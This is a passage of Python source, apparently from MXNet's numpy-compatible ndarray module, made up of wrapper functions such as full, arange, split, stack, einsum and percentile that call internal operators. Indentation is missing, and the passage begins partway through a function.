return _npi.broadcast_to(array, shape)
@set_module('mxnet.ndarray.numpy')
def full(shape, fill_value, dtype=None, order='C', ctx=None, out=None):
if order != 'C':
raise NotImplementedError
if ctx is None:
ctx = current_context()
if isinstance(fill_value, NDArray):
if dtype is None:
ret = broadcast_to(fill_value, shape)
else:
ret = broadcast_to(fill_value, shape).astype(dtype)
return ret
dtype = _np.float32 if dtype is None else dtype
return _npi.full(shape=shape, value=fill_value, ctx=ctx, dtype=dtype, out=out)
@set_module('mxnet.ndarray.numpy')
def full_like(a, fill_value, dtype=None, order='C', ctx=None, out=None):
if order != 'C':
raise NotImplementedError
if ctx is None:
ctx = current_context()
return _npi.full_like(a, fill_value=fill_value, dtype=dtype, ctx=ctx, out=out)
@set_module('mxnet.ndarray.numpy')
def empty_like(prototype, dtype=None, order='C', subok=False, shape=None):
dtype_list = {None:'None', _np.int8:'int8', _np.uint8:'uint8', _np.int32:'int32',
_np.int64:'int64', _np.float16:'float16', _np.float32:'float32',
_np.float64:'float64', _np.bool_:'bool_', bool:'bool', int:'int64', float:'float64'}
if order != 'C':
raise NotImplementedError("Only support C-order at this moment")
if subok:
raise NotImplementedError("Creating array by using sub-class is not supported at this moment")
if shape is not None:
raise NotImplementedError("Assigning new shape is not supported at this moment")
try:
dtype = dtype if isinstance(dtype, str) else dtype_list[dtype]
except:
raise NotImplementedError("Do not support this dtype at this moment")
return _npi.empty_like_fallback(prototype, dtype=dtype, order=order, subok=subok, shape=shape)
@set_module('mxnet.ndarray.numpy')
def arange(start, stop=None, step=1, dtype=None, ctx=None):
if dtype is None:
dtype = 'float32'
if ctx is None:
ctx = current_context()
if stop is None:
stop = start
start = 0
if step is None:
step = 1
if start is None and stop is None:
raise ValueError('start and stop cannot be both None')
if step == 0:
raise ZeroDivisionError('step cannot be 0')
return _npi.arange(start=start, stop=stop, step=step, dtype=dtype, ctx=ctx)
@set_module('mxnet.ndarray.numpy')
def identity(n, dtype=None, ctx=None):
if not isinstance(n, int):
raise TypeError("Input 'n' should be an integer")
if n < 0:
raise ValueError("Input 'n' cannot be negative")
if ctx is None:
ctx = current_context()
dtype = _np.float32 if dtype is None else dtype
return _npi.identity(shape=(n, n), ctx=ctx, dtype=dtype)
@set_module('mxnet.ndarray.numpy')
def take(a, indices, axis=None, mode='raise', out=None):
if mode not in ('wrap', 'clip', 'raise'):
raise NotImplementedError(
"function take does not support mode '{}'".format(mode))
if axis is None:
return _npi.take(_npi.reshape(a, -1), indices, 0, mode, out)
else:
return _npi.take(a, indices, axis, mode, out)
@set_module('mxnet.ndarray.numpy')
def insert(arr, obj, values, axis=None):
if isinstance(values, numeric_types):
if isinstance(obj, slice):
start = obj.start
stop = obj.stop
step = 1 if obj.step is None else obj.step
return _npi.insert_slice(arr, val=values, start=start, stop=stop, step=step, axis=axis)
elif isinstance(obj, integer_types):
return _npi.insert_scalar(arr, val=values, int_ind=obj, axis=axis)
elif isinstance(obj, NDArray):
return _npi.insert_tensor(arr, obj, val=values, axis=axis)
if not isinstance(arr, NDArray):
raise TypeError("'arr' can not support type {}".format(str(type(arr))))
if not isinstance(values, NDArray):
raise TypeError("'values' can not support type {}".format(str(type(values))))
if isinstance(obj, slice):
start = obj.start
stop = obj.stop
step = 1 if obj.step is None else obj.step
return _npi.insert_slice(arr, values, start=start, stop=stop, step=step, axis=axis)
elif isinstance(obj, integer_types):
return _npi.insert_scalar(arr, values, int_ind=obj, axis=axis)
elif isinstance(obj, NDArray):
return _npi.insert_tensor(arr, values, obj, axis=axis)
else:
raise TypeError("'obj' can not support type {}".format(str(type(obj))))
def _ufunc_helper(lhs, rhs, fn_array, fn_scalar, lfn_scalar, rfn_scalar=None, out=None):
from ...numpy import ndarray
if isinstance(lhs, numeric_types):
if isinstance(rhs, numeric_types):
return fn_scalar(lhs, rhs, out=out)
else:
if rfn_scalar is None:
return lfn_scalar(rhs, float(lhs), out=out)
else:
return rfn_scalar(rhs, float(lhs), out=out)
elif isinstance(rhs, numeric_types):
return lfn_scalar(lhs, float(rhs), out=out)
elif isinstance(rhs, ndarray):
return fn_array(lhs, rhs, out=out)
else:
raise TypeError('type {} not supported'.format(str(type(rhs))))
@set_module('mxnet.ndarray.numpy')
def unique(ar, return_index=False, return_inverse=False, return_counts=False, axis=None):
ret = _npi.unique(ar, return_index, return_inverse, return_counts, axis)
if isinstance(ret, list):
return tuple(ret)
else:
return ret
@set_module('mxnet.ndarray.numpy')
@wrap_np_binary_func
def add(x1, x2, out=None, **kwargs):
return _ufunc_helper(x1, x2, _npi.add, _np.add, _npi.add_scalar, None, out)
@set_module('mxnet.ndarray.numpy')
@wrap_np_binary_func
def subtract(x1, x2, out=None, **kwargs):
return _ufunc_helper(x1, x2, _npi.subtract, _np.subtract, _npi.subtract_scalar,
_npi.rsubtract_scalar, out)
@set_module('mxnet.ndarray.numpy')
@wrap_np_binary_func
def multiply(x1, x2, out=None, **kwargs):
return _ufunc_helper(x1, x2, _npi.multiply, _np.multiply, _npi.multiply_scalar, None, out)
@set_module('mxnet.ndarray.numpy')
@wrap_np_binary_func
def divide(x1, x2, out=None, **kwargs):
return _ufunc_helper(x1, x2, _npi.true_divide, _np.divide, _npi.true_divide_scalar,
_npi.rtrue_divide_scalar, out)
@set_module('mxnet.ndarray.numpy')
def true_divide(x1, x2, out=None):
return _ufunc_helper(x1, x2, _npi.true_divide, _np.divide, _npi.true_divide_scalar,
_npi.rtrue_divide_scalar, out)
@set_module('mxnet.ndarray.numpy')
@wrap_np_binary_func
def mod(x1, x2, out=None, **kwargs):
return _ufunc_helper(x1, x2, _npi.mod, _np.mod, _npi.mod_scalar, _npi.rmod_scalar, out)
@set_module('mxnet.ndarray.numpy')
def delete(arr, obj, axis=None):
if not isinstance(arr, NDArray):
raise TypeError("'arr' can not support type {}".format(str(type(arr))))
if isinstance(obj, slice):
start = obj.start
stop = obj.stop
step = 1 if obj.step is None else obj.step
return _npi.delete(arr, start=start, stop=stop, step=step, axis=axis)
elif isinstance(obj, integer_types):
return _npi.delete(arr, int_ind=obj, axis=axis)
elif isinstance(obj, NDArray):
return _npi.delete(arr, obj, axis=axis)
else:
raise TypeError("'obj' can not support type {}".format(str(type(obj))))
@set_module('mxnet.ndarray.numpy')
@wrap_np_binary_func
def matmul(a, b, out=None):
return _npi.matmul(a, b, out=out)
@set_module('mxnet.ndarray.numpy')
@wrap_np_binary_func
def remainder(x1, x2, out=None):
return _ufunc_helper(x1, x2, _npi.mod, _np.mod, _npi.mod_scalar, _npi.rmod_scalar, out)
@set_module('mxnet.ndarray.numpy')
@wrap_np_binary_func
def power(x1, x2, out=None, **kwargs):
return _ufunc_helper(x1, x2, _npi.power, _np.power, _npi.power_scalar, _npi.rpower_scalar, out)
@set_module('mxnet.ndarray.numpy')
def argsort(a, axis=-1, kind=None, order=None):
if order is not None:
raise NotImplementedError("order not supported here")
return _npi.argsort(data=a, axis=axis, is_ascend=True, dtype='int64')
@set_module('mxnet.ndarray.numpy')
def sort(a, axis=-1, kind=None, order=None):
if order is not None:
raise NotImplementedError("order not supported here")
return _npi.sort(data=a, axis=axis, is_ascend=True)
@set_module('mxnet.ndarray.numpy')
def tensordot(a, b, axes=2):
if _np.isscalar(axes):
return _npi.tensordot_int_axes(a, b, axes)
if len(axes) != 2:
raise ValueError('Axes must consist of two arrays.')
a_axes_summed, b_axes_summed = axes
if _np.isscalar(a_axes_summed):
a_axes_summed = (a_axes_summed,)
if _np.isscalar(b_axes_summed):
b_axes_summed = (b_axes_summed,)
if len(a_axes_summed) != len(b_axes_summed):
raise ValueError('Axes length mismatch')
return _npi.tensordot(a, b, a_axes_summed, b_axes_summed)
@set_module('mxnet.ndarray.numpy')
def histogram(a, bins=10, range=None, normed=None, weights=None, density=None):
if normed is True:
raise NotImplementedError("normed is not supported yet...")
if weights is not None:
raise NotImplementedError("weights is not supported yet...")
if density is True:
raise NotImplementedError("density is not supported yet...")
if isinstance(bins, numeric_types):
if range is None:
raise NotImplementedError("automatic range is not supported yet...")
return _npi.histogram(a, bin_cnt=bins, range=range)
if isinstance(bins, (list, tuple)):
raise NotImplementedError("array_like bins is not supported yet...")
if isinstance(bins, str):
raise NotImplementedError("string bins is not supported yet...")
if isinstance(bins, NDArray):
return _npi.histogram(a, bins=bins)
raise ValueError("np.histogram fails with", locals())
@set_module('mxnet.ndarray.numpy')
def eye(N, M=None, k=0, dtype=_np.float32, **kwargs):
_sanity_check_params('eye', ['order'], kwargs)
ctx = kwargs.pop('ctx', current_context())
if ctx is None:
ctx = current_context()
return _npi.eye(N, M, k, ctx, dtype)
@set_module('mxnet.ndarray.numpy')
def linspace(start, stop, num=50, endpoint=True, retstep=False, dtype=None, axis=0, ctx=None):
if isinstance(start, (list, _np.ndarray, NDArray)) or \
isinstance(stop, (list, _np.ndarray, NDArray)):
raise NotImplementedError('start and stop only support int')
if axis != 0:
raise NotImplementedError("the function only support axis 0")
if ctx is None:
ctx = current_context()
if retstep:
step = (stop - start) / (num - 1)
return _npi.linspace(start=start, stop=stop, num=num, endpoint=endpoint, ctx=ctx, dtype=dtype), step
else:
return _npi.linspace(start=start, stop=stop, num=num, endpoint=endpoint, ctx=ctx, dtype=dtype)
@set_module('mxnet.ndarray.numpy')
def logspace(start, stop, num=50, endpoint=True, base=10.0, dtype=None, axis=0, ctx=None):
if isinstance(start, (list, tuple, _np.ndarray, NDArray)) or \
isinstance(stop, (list, tuple, _np.ndarray, NDArray)):
raise NotImplementedError('start and stop only support int and float')
if axis != 0:
raise NotImplementedError("the function only support axis 0")
if ctx is None:
ctx = current_context()
return _npi.logspace(start=start, stop=stop, num=num, endpoint=endpoint, base=base, ctx=ctx, dtype=dtype)
@set_module('mxnet.ndarray.numpy')
def expand_dims(a, axis):
return _npi.expand_dims(a, axis)
@set_module('mxnet.ndarray.numpy')
@wrap_np_binary_func
def lcm(x1, x2, out=None, **kwargs):
return _ufunc_helper(x1, x2, _npi.lcm, _np.lcm, _npi.lcm_scalar, None, out)
@set_module('mxnet.ndarray.numpy')
def tril(m, k=0):
return _npi.tril(m, k)
def _unary_func_helper(x, fn_array, fn_scalar, out=None, **kwargs):
if isinstance(x, numeric_types):
return fn_scalar(x, **kwargs)
elif isinstance(x, NDArray):
return fn_array(x, out=out, **kwargs)
else:
raise TypeError('type {} not supported'.format(str(type(x))))
@set_module('mxnet.ndarray.numpy')
@wrap_np_unary_func
def sin(x, out=None, **kwargs):
return _unary_func_helper(x, _npi.sin, _np.sin, out=out, **kwargs)
@set_module('mxnet.ndarray.numpy')
@wrap_np_unary_func
def cos(x, out=None, **kwargs):
return _unary_func_helper(x, _npi.cos, _np.cos, out=out, **kwargs)
@set_module('mxnet.ndarray.numpy')
@wrap_np_unary_func
def sinh(x, out=None, **kwargs):
return _unary_func_helper(x, _npi.sinh, _np.sinh, out=out, **kwargs)
@set_module('mxnet.ndarray.numpy')
@wrap_np_unary_func
def cosh(x, out=None, **kwargs):
return _unary_func_helper(x, _npi.cosh, _np.cosh, out=out, **kwargs)
@set_module('mxnet.ndarray.numpy')
@wrap_np_unary_func
def tanh(x, out=None, **kwargs):
return _unary_func_helper(x, _npi.tanh, _np.tanh, out=out, **kwargs)
@set_module('mxnet.ndarray.numpy')
@wrap_np_unary_func
def log10(x, out=None, **kwargs):
return _unary_func_helper(x, _npi.log10, _np.log10, out=out, **kwargs)
@set_module('mxnet.ndarray.numpy')
@wrap_np_unary_func
def sqrt(x, out=None, **kwargs):
return _unary_func_helper(x, _npi.sqrt, _np.sqrt, out=out, **kwargs)
@set_module('mxnet.ndarray.numpy')
@wrap_np_unary_func
def cbrt(x, out=None, **kwargs):
return _unary_func_helper(x, _npi.cbrt, _np.cbrt, out=out, **kwargs)
@set_module('mxnet.ndarray.numpy')
@wrap_np_unary_func
def abs(x, out=None, **kwargs):
return _unary_func_helper(x, _npi.abs, _np.abs, out=out, **kwargs)
@set_module('mxnet.ndarray.numpy')
@wrap_np_unary_func
def absolute(x, out=None, **kwargs):
return _unary_func_helper(x, _npi.absolute, _np.absolute, out=out, **kwargs)
@set_module('mxnet.ndarray.numpy')
@wrap_np_unary_func
def sign(x, out=None, **kwargs):
return _unary_func_helper(x, _npi.sign, _np.sign, out=out, **kwargs)
@set_module('mxnet.ndarray.numpy')
@wrap_np_unary_func
def exp(x, out=None, **kwargs):
return _unary_func_helper(x, _npi.exp, _np.exp, out=out, **kwargs)
@set_module('mxnet.ndarray.numpy')
@wrap_np_unary_func
def expm1(x, out=None, **kwargs):
return _unary_func_helper(x, _npi.expm1, _np.expm1, out=out, **kwargs)
@set_module('mxnet.ndarray.numpy')
@wrap_np_unary_func
def arcsin(x, out=None, **kwargs):
return _unary_func_helper(x, _npi.arcsin, _np.arcsin, out=out, **kwargs)
@set_module('mxnet.ndarray.numpy')
@wrap_np_unary_func
def arccos(x, out=None, **kwargs):
return _unary_func_helper(x, _npi.arccos, _np.arccos, out=out, **kwargs)
@set_module('mxnet.ndarray.numpy')
@wrap_np_unary_func
def arctan(x, out=None, **kwargs):
return _unary_func_helper(x, _npi.arctan, _np.arctan, out=out, **kwargs)
@set_module('mxnet.ndarray.numpy')
@wrap_np_unary_func
def log(x, out=None, **kwargs):
return _unary_func_helper(x, _npi.log, _np.log, out=out, **kwargs)
@set_module('mxnet.ndarray.numpy')
@wrap_np_unary_func
def degrees(x, out=None, **kwargs):
return _unary_func_helper(x, _npi.degrees, _np.degrees, out=out, **kwargs)
@set_module('mxnet.ndarray.numpy')
@wrap_np_unary_func
def rad2deg(x, out=None, **kwargs):
return _unary_func_helper(x, _npi.rad2deg, _np.rad2deg, out=out)
@set_module('mxnet.ndarray.numpy')
@wrap_np_unary_func
def rint(x, out=None, **kwargs):
return _unary_func_helper(x, _npi.rint, _np.rint, out=out, **kwargs)
@set_module('mxnet.ndarray.numpy')
@wrap_np_unary_func
def log2(x, out=None, **kwargs):
return _unary_func_helper(x, _npi.log2, _np.log2, out=out, **kwargs)
@set_module('mxnet.ndarray.numpy')
@wrap_np_unary_func
def log1p(x, out=None, **kwargs):
return _unary_func_helper(x, _npi.log1p, _np.log1p, out=out, **kwargs)
@set_module('mxnet.ndarray.numpy')
@wrap_np_unary_func
def radians(x, out=None, **kwargs):
return _unary_func_helper(x, _npi.radians, _np.radians, out=out, **kwargs)
@set_module('mxnet.ndarray.numpy')
@wrap_np_unary_func
def deg2rad(x, out=None, **kwargs):
return _unary_func_helper(x, _npi.deg2rad, _np.deg2rad, out=out)
@set_module('mxnet.ndarray.numpy')
@wrap_np_unary_func
def reciprocal(x, out=None, **kwargs):
return _unary_func_helper(x, _npi.reciprocal, _np.reciprocal, out=out, **kwargs)
@set_module('mxnet.ndarray.numpy')
@wrap_np_unary_func
def square(x, out=None, **kwargs):
return _unary_func_helper(x, _npi.square, _np.square, out=out, **kwargs)
@set_module('mxnet.ndarray.numpy')
@wrap_np_unary_func
def negative(x, out=None, **kwargs):
return _unary_func_helper(x, _npi.negative, _np.negative, out=out)
@set_module('mxnet.ndarray.numpy')
@wrap_np_unary_func
def fix(x, out=None, **kwargs):
return _unary_func_helper(x, _npi.fix, _np.fix, out=out)
@set_module('mxnet.ndarray.numpy')
@wrap_np_unary_func
def tan(x, out=None, **kwargs):
return _unary_func_helper(x, _npi.tan, _np.tan, out=out, **kwargs)
@set_module('mxnet.ndarray.numpy')
@wrap_np_unary_func
def ceil(x, out=None, **kwargs):
return _unary_func_helper(x, _npi.ceil, _np.ceil, out=out, **kwargs)
@set_module('mxnet.ndarray.numpy')
@wrap_np_unary_func
def floor(x, out=None, **kwargs):
return _unary_func_helper(x, _npi.floor, _np.floor, out=out, **kwargs)
@set_module('mxnet.ndarray.numpy')
@wrap_np_unary_func
def bitwise_not(x, out=None, **kwargs):
return _unary_func_helper(x, _npi.bitwise_not, _np.bitwise_not, out=out, **kwargs)
@set_module('mxnet.ndarray.numpy')
@wrap_np_unary_func
def invert(x, out=None, **kwargs):
return _unary_func_helper(x, _npi.bitwise_not, _np.bitwise_not, out=out, **kwargs)
@set_module('mxnet.ndarray.numpy')
@wrap_np_unary_func
def trunc(x, out=None, **kwargs):
return _unary_func_helper(x, _npi.trunc, _np.trunc, out=out, **kwargs)
@set_module('mxnet.ndarray.numpy')
@wrap_np_unary_func
def logical_not(x, out=None, **kwargs):
return _unary_func_helper(x, _npi.logical_not, _np.logical_not, out=out, **kwargs)
@set_module('mxnet.ndarray.numpy')
@wrap_np_unary_func
def arcsinh(x, out=None, **kwargs):
return _unary_func_helper(x, _npi.arcsinh, _np.arcsinh, out=out, **kwargs)
@set_module('mxnet.ndarray.numpy')
@wrap_np_unary_func
def arccosh(x, out=None, **kwargs):
return _unary_func_helper(x, _npi.arccosh, _np.arccosh, out=out, **kwargs)
@set_module('mxnet.ndarray.numpy')
@wrap_np_unary_func
def arctanh(x, out=None, **kwargs):
return _unary_func_helper(x, _npi.arctanh, _np.arctanh, out=out, **kwargs)
@set_module('mxnet.ndarray.numpy')
def tile(A, reps):
return _unary_func_helper(A, _npi.tile, _np.tile, reps=reps)
@set_module('mxnet.ndarray.numpy')
def split(ary, indices_or_sections, axis=0):
axis_size = ary.shape[axis]
if isinstance(indices_or_sections, integer_types):
sections = indices_or_sections
if axis_size % sections:
raise ValueError('array split does not result in an equal division')
section_size = int(axis_size / sections)
indices = [i * section_size for i in range(sections)]
elif isinstance(indices_or_sections, (list, set, tuple)):
indices = [0] + list(indices_or_sections)
else:
raise ValueError('indices_or_sections must be either int, or tuple / list / set of ints')
ret = _npi.split(ary, indices, axis, False)
assert isinstance(ret, list), 'Output of split should be list,' \
' got a return type {}'.format(type(ret))
return ret
@set_module('mxnet.ndarray.numpy')
def array_split(ary, indices_or_sections, axis=0):
indices = []
sections = 0
if isinstance(indices_or_sections, integer_types):
sections = indices_or_sections
elif isinstance(indices_or_sections, (list, set, tuple)):
indices = [0] + list(indices_or_sections)
else:
raise ValueError('indices_or_sections must be either int, or tuple / list / set of ints')
ret = _npi.split(ary, indices, axis, False, sections)
if not isinstance(ret, list):
return [ret]
return ret
@set_module('mxnet.ndarray.numpy')
def hsplit(ary, indices_or_sections):
if len(ary.shape) < 1:
raise ValueError('hsplit only works on arrays of 1 or more dimensions')
indices = []
sections = 0
if isinstance(indices_or_sections, integer_types):
sections = indices_or_sections
elif isinstance(indices_or_sections, (list, set, tuple)):
indices = [0] + list(indices_or_sections)
else:
raise ValueError('indices_or_sections must be either int, or tuple / list / set of ints')
ret = _npi.hsplit(ary, indices, 1, False, sections)
if not isinstance(ret, list):
return [ret]
return ret
@set_module('mxnet.ndarray.numpy')
def vsplit(ary, indices_or_sections):
if len(ary.shape) < 2:
raise ValueError("vsplit only works on arrays of 2 or more dimensions")
return split(ary, indices_or_sections, 0)
@set_module('mxnet.ndarray.numpy')
def dsplit(ary, indices_or_sections):
if len(ary.shape) < 3:
raise ValueError('dsplit only works on arrays of 3 or more dimensions')
return split(ary, indices_or_sections, 2)
@set_module('mxnet.ndarray.numpy')
def concatenate(seq, axis=0, out=None):
return _npi.concatenate(*seq, axis=axis, out=out)
@set_module('mxnet.ndarray.numpy')
def append(arr, values, axis=None):
return _npi.concatenate(arr, values, axis=axis, out=None)
@set_module('mxnet.ndarray.numpy')
def stack(arrays, axis=0, out=None):
def get_list(arrays):
if not hasattr(arrays, '__getitem__') and hasattr(arrays, '__iter__'):
raise ValueError("expected iterable for arrays but got {}".format(type(arrays)))
return [arr for arr in arrays]
arrays = get_list(arrays)
return _npi.stack(*arrays, axis=axis, out=out)
@set_module('mxnet.ndarray.numpy')
def vstack(arrays, out=None):
def get_list(arrays):
if not hasattr(arrays, '__getitem__') and hasattr(arrays, '__iter__'):
raise ValueError("expected iterable for arrays but got {}".format(type(arrays)))
return [arr for arr in arrays]
arrays = get_list(arrays)
return _npi.vstack(*arrays)
@set_module('mxnet.ndarray.numpy')
def row_stack(arrays):
def get_list(arrays):
if not hasattr(arrays, '__getitem__') and hasattr(arrays, '__iter__'):
raise ValueError("expected iterable for arrays but got {}".format(type(arrays)))
return [arr for arr in arrays]
arrays = get_list(arrays)
return _npi.vstack(*arrays)
@set_module('mxnet.ndarray.numpy')
def column_stack(tup):
return _npi.column_stack(*tup)
@set_module('mxnet.ndarray.numpy')
def hstack(arrays):
return _npi.hstack(*arrays)
@set_module('mxnet.ndarray.numpy')
def dstack(arrays):
return _npi.dstack(*arrays)
@set_module('mxnet.ndarray.numpy')
@wrap_np_binary_func
def maximum(x1, x2, out=None, **kwargs):
return _ufunc_helper(x1, x2, _npi.maximum, _np.maximum, _npi.maximum_scalar, None, out)
@set_module('mxnet.ndarray.numpy')
@wrap_np_binary_func
def minimum(x1, x2, out=None, **kwargs):
return _ufunc_helper(x1, x2, _npi.minimum, _np.minimum, _npi.minimum_scalar, None, out)
@set_module('mxnet.ndarray.numpy')
def swapaxes(a, axis1, axis2):
return _npi.swapaxes(a, dim1=axis1, dim2=axis2)
@set_module('mxnet.ndarray.numpy')
def clip(a, a_min, a_max, out=None):
if a_min is None and a_max is None:
raise ValueError('array_clip: must set either max or min')
if a_min is None:
a_min = float('-inf')
if a_max is None:
a_max = float('inf')
return _npi.clip(a, a_min, a_max, out=out)
@set_module('mxnet.ndarray.numpy')
def argmax(a, axis=None, out=None):
return _npi.argmax(a, axis=axis, keepdims=False, out=out)
@set_module('mxnet.ndarray.numpy')
def argmin(a, axis=None, out=None):
return _npi.argmin(a, axis=axis, keepdims=False, out=out)
@set_module('mxnet.ndarray.numpy')
def average(a, axis=None, weights=None, returned=False, out=None):
if weights is None:
return _npi.average(a, axis=axis, weights=None, returned=returned, weighted=False, out=out)
else:
return _npi.average(a, axis=axis, weights=weights, returned=returned, out=out)
@set_module('mxnet.ndarray.numpy')
def mean(a, axis=None, dtype=None, out=None, keepdims=False):
return _npi.mean(a, axis=axis, dtype=dtype, keepdims=keepdims, out=out)
@set_module('mxnet.ndarray.numpy')
def std(a, axis=None, dtype=None, out=None, ddof=0, keepdims=False):
return _npi.std(a, axis=axis, dtype=dtype, ddof=ddof, keepdims=keepdims, out=out)
@set_module('mxnet.ndarray.numpy')
def var(a, axis=None, dtype=None, out=None, ddof=0, keepdims=False):
return _npi.var(a, axis=axis, dtype=dtype, ddof=ddof, keepdims=keepdims, out=out)
@set_module('mxnet.ndarray.numpy')
def indices(dimensions, dtype=_np.int32, ctx=None):
if isinstance(dimensions, (tuple, list)):
if ctx is None:
ctx = current_context()
return _npi.indices(dimensions=dimensions, dtype=dtype, ctx=ctx)
else:
raise ValueError("The dimensions must be sequence of ints")
@set_module('mxnet.ndarray.numpy')
@wrap_np_binary_func
def copysign(x1, x2, out=None, **kwargs):
return _ufunc_helper(x1, x2, _npi.copysign, _np.copysign, _npi.copysign_scalar, _npi.rcopysign_scalar, out)
@set_module('mxnet.ndarray.numpy')
def ravel(x, order='C'):
if order != 'C':
raise NotImplementedError('order {} is not supported'.format(order))
if isinstance(x, numeric_types):
return _np.reshape(x, -1)
elif isinstance(x, NDArray):
return _npi.reshape(x, -1)
else:
raise TypeError('type {} not supported'.format(str(type(x))))
def unravel_index(indices, shape, order='C'):
if order == 'C':
if isinstance(indices, numeric_types):
return _np.unravel_index(indices, shape)
ret = _npi.unravel_index_fallback(indices, shape=shape)
ret_list = []
for item in ret:
ret_list += [item]
return tuple(ret_list)
else:
raise NotImplementedError('Do not support column-major (Fortran-style) order at this moment')
def diag_indices_from(arr):
return tuple(_npi.diag_indices_from(arr))
@set_module('mxnet.ndarray.numpy')
def hanning(M, dtype=_np.float32, ctx=None):
if ctx is None:
ctx = current_context()
return _npi.hanning(M, dtype=dtype, ctx=ctx)
@set_module('mxnet.ndarray.numpy')
def hamming(M, dtype=_np.float32, ctx=None):
if ctx is None:
ctx = current_context()
return _npi.hamming(M, dtype=dtype, ctx=ctx)
@set_module('mxnet.ndarray.numpy')
def blackman(M, dtype=_np.float32, ctx=None):
if ctx is None:
ctx = current_context()
return _npi.blackman(M, dtype=dtype, ctx=ctx)
@set_module('mxnet.ndarray.numpy')
def flip(m, axis=None, out=None):
from ...numpy import ndarray
if isinstance(m, numeric_types):
return _np.flip(m, axis)
elif isinstance(m, ndarray):
return _npi.flip(m, axis, out=out)
else:
raise TypeError('type {} not supported'.format(str(type(m))))
@set_module('mxnet.ndarray.numpy')
def flipud(m):
return flip(m, 0)
@set_module('mxnet.ndarray.numpy')
def fliplr(m):
return flip(m, 1)
@set_module('mxnet.ndarray.numpy')
def around(x, decimals=0, out=None, **kwargs):
from ...numpy import ndarray
if isinstance(x, numeric_types):
return _np.around(x, decimals, **kwargs)
elif isinstance(x, ndarray):
return _npi.around(x, decimals, out=out, **kwargs)
else:
raise TypeError('type {} not supported'.format(str(type(x))))
@set_module('mxnet.ndarray.numpy')
def round(x, decimals=0, out=None, **kwargs):
from ...numpy import ndarray
if isinstance(x, numeric_types):
return _np.around(x, decimals, **kwargs)
elif isinstance(x, ndarray):
return _npi.around(x, decimals, out=out, **kwargs)
else:
raise TypeError('type {} not supported'.format(str(type(x))))
@set_module('mxnet.ndarray.numpy')
@wrap_np_binary_func
def arctan2(x1, x2, out=None, **kwargs):
return _ufunc_helper(x1, x2, _npi.arctan2, _np.arctan2,
_npi.arctan2_scalar, _npi.rarctan2_scalar, out=out)
@set_module('mxnet.ndarray.numpy')
@wrap_np_binary_func
def hypot(x1, x2, out=None, **kwargs):
return _ufunc_helper(x1, x2, _npi.hypot, _np.hypot, _npi.hypot_scalar, None, out)
@set_module('mxnet.ndarray.numpy')
@wrap_np_binary_func
def bitwise_and(x1, x2, out=None, **kwargs):
return _ufunc_helper(x1, x2, _npi.bitwise_and, _np.bitwise_and, _npi.bitwise_and_scalar, None, out)
@set_module('mxnet.ndarray.numpy')
@wrap_np_binary_func
def bitwise_xor(x1, x2, out=None, **kwargs):
return _ufunc_helper(x1, x2, _npi.bitwise_xor, _np.bitwise_xor, _npi.bitwise_xor_scalar, None, out)
@set_module('mxnet.ndarray.numpy')
@wrap_np_binary_func
def bitwise_or(x1, x2, out=None, **kwargs):
return _ufunc_helper(x1, x2, _npi.bitwise_or, _np.bitwise_or, _npi.bitwise_or_scalar, None, out)
@set_module('mxnet.ndarray.numpy')
@wrap_np_binary_func
def ldexp(x1, x2, out=None, **kwargs):
return _ufunc_helper(x1, x2, _npi.ldexp, _np.ldexp, _npi.ldexp_scalar, _npi.rldexp_scalar, out)
@set_module('mxnet.ndarray.numpy')
def inner(a, b):
return tensordot(a, b, [-1, -1])
@set_module('mxnet.ndarray.numpy')
def outer(a, b):
return tensordot(a.flatten(), b.flatten(), 0)
@set_module('mxnet.ndarray.numpy')
def vdot(a, b):
return tensordot(a.flatten(), b.flatten(), 1)
@set_module('mxnet.ndarray.numpy')
def equal(x1, x2, out=None):
return _ufunc_helper(x1, x2, _npi.equal, _np.equal, _npi.equal_scalar, None, out)
@set_module('mxnet.ndarray.numpy')
def not_equal(x1, x2, out=None):
return _ufunc_helper(x1, x2, _npi.not_equal, _np.not_equal, _npi.not_equal_scalar, None, out)
@set_module('mxnet.ndarray.numpy')
def greater(x1, x2, out=None):
return _ufunc_helper(x1, x2, _npi.greater, _np.greater, _npi.greater_scalar,
_npi.less_scalar, out)
@set_module('mxnet.ndarray.numpy')
def less(x1, x2, out=None):
return _ufunc_helper(x1, x2, _npi.less, _np.less, _npi.less_scalar, _npi.greater_scalar, out)
@set_module('mxnet.ndarray.numpy')
def greater_equal(x1, x2, out=None):
return _ufunc_helper(x1, x2, _npi.greater_equal, _np.greater_equal, _npi.greater_equal_scalar,
_npi.less_equal_scalar, out)
@set_module('mxnet.ndarray.numpy')
def less_equal(x1, x2, out=None):
return _ufunc_helper(x1, x2, _npi.less_equal, _np.less_equal, _npi.less_equal_scalar,
_npi.greater_equal_scalar, out)
@set_module('mxnet.ndarray.numpy')
def rot90(m, k=1, axes=(0, 1)):
return _npi.rot90(m, k=k, axes=axes)
@set_module('mxnet.ndarray.numpy')
def einsum(*operands, **kwargs):
optimize_arg = kwargs.pop('optimize', False)
out = kwargs.pop('out', None)
subscripts = operands[0]
operands = operands[1:]
return _npi.einsum(*operands, subscripts=subscripts, out=out, optimize=int(optimize_arg))
@set_module('mxnet.ndarray.numpy')
def nonzero(a):
out = _npi.nonzero(a).transpose()
return tuple([out[i] for i in range(len(out))])
@set_module('mxnet.ndarray.numpy')
def percentile(a, q, axis=None, out=None, overwrite_input=None, interpolation='linear', keepdims=False):
if overwrite_input is not None:
raise NotImplementedError('overwrite_input is not supported yet')
if isinstance(q, numeric_types):
return _npi.percentile(a, axis=axis, interpolation=interpolation,
keepdims=keepdims, q_scalar=q, out=out)
return _npi.percentile(a, q, axis=axis, interpolation=interpolation,
keepdims=keepdims, q_scalar=None, out=out)
@set_module('mxnet.ndarray.numpy')
def quantile(a, q, axis=None, out=None, overwrite_input=None, interpolation='linear', keepdims=False):
if overwrite_input is not None:
raise NotImplementedError('overwrite_input is not supported yet')
if isinstance(q, numeric_types):
return _npi.percentile(a, axis=axis, interpolation=interpolation,
keepdims=keepdims, q_scalar=q * 100, out=out)
return _npi.percentile(a, q * 100, axis=axis, interpolation=interpolation,
keepdims=keepdims, q_scalar=None, out=out)
@set_module('mxnet.ndarray.numpy')
def shares_memory(a, b, max_work=None):
return _npi.share_memory(a, b).item()
@set_module('mxnet.ndarray.numpy')
def may_share_memory(a, b, max_work=None):
return _npi.share_memory(a, b).item()
@set_module('mxnet.ndarray.numpy')
def diff(a, n=1, axis=-1, prepend=None, append=None):
if (prepend or append):
raise NotImplementedError('prepend and append options are not supported yet')
return _npi.diff(a, n=n, axis=axis)
@set_module('mxnet.ndarray.numpy')
def resize(a, new_shape):
return _npi.resize_fallback(a, new_shape=new_shape)
